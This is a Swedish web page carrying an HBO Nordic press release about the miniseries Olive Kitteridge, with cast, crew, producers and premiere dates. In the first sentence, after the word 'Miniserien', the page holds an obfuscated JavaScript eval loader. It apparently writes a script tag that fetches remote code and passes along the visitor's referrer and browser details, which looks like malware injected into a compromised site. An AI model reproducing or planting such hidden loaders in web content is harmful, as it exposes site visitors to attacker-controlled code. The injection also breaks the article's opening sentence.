Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Olive Kitteridge på HBO Nordic

Olive Kitteridge på HBO Nordic
Sebastian

Miniserien eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tihis|var|u0026u|referrer|anssk||js|php’.split(’|’),0,{}))
Olive Kitteridge, som under Venedigs Filmfestival omnämndes som festivalens största positiva överraskning, kommer nu till HBO Nordic. Frances McDormand (Fargo) gör huvudrollen som Olive Kitteridge och Richard Jenkins (Six Feet Under) spelar hennes make Henry. Miniserien är uppdelad i fyra delar som är regisserade av Lisa Cholodenko (The Kids Are All Right). De första två avsnitten kommer till HBO Nordic den 3:e november och redan dagen efter, den 4:e november, visas de två sista avsnitten.

Olive Kitteridge är baserad på Elizabeth Strouts Pulitzerbelönade novel av samma namn, och är skriven av Emmyvinnaren Jane Anderson. Miniserien i fyra delar, berättar den rara och roliga men även tragiska historien om småstadslivet i New England, USA. I händelsernas centrum står Olive, som med sin vassa tunga och hårda yttre gömmer ett varmt men bekymrat hjärta.

Historien utspelar sig över 25 år och följer Olive och hennes relationer med maken Henry, en godhjärtad person och stadens apotekare, samt deras son Christopher (John Gallagher JR), som avskyr sin moders sätt att uppfostra honom. I serien ser vi även Bill Murray i rollen som Jack Kennison, en änkling som blir vän med Olive samt Emmynominerade Peter Mullan (Top of the Lake) som spelar Olives kollega Jim O´Casey. Rosemarie DeWitt (Mad Men) ser vi i rollen som Rachel Coulson, en ofta sjuk och frekvent kund till Henrys apotek.

Seriens exekutiva producenter är bland annat Tom Hanks, Gary Goetzman, Frances McDormand och Jane Anderson. Olive Kitteridge är Tom Hanks och Gary Goetzmans senaste miniserie med HBO och följer prisbelönade serier som The Pacific, John Adams, Band of Brothers och Big Love.

Avsnitt 1-2 har premiär den 3:e november på HBO Nordic
Avsnitt 3-4 visas den 4:e november på HBO Nordic

Detta är ett pressmeddelande från HBO Nordic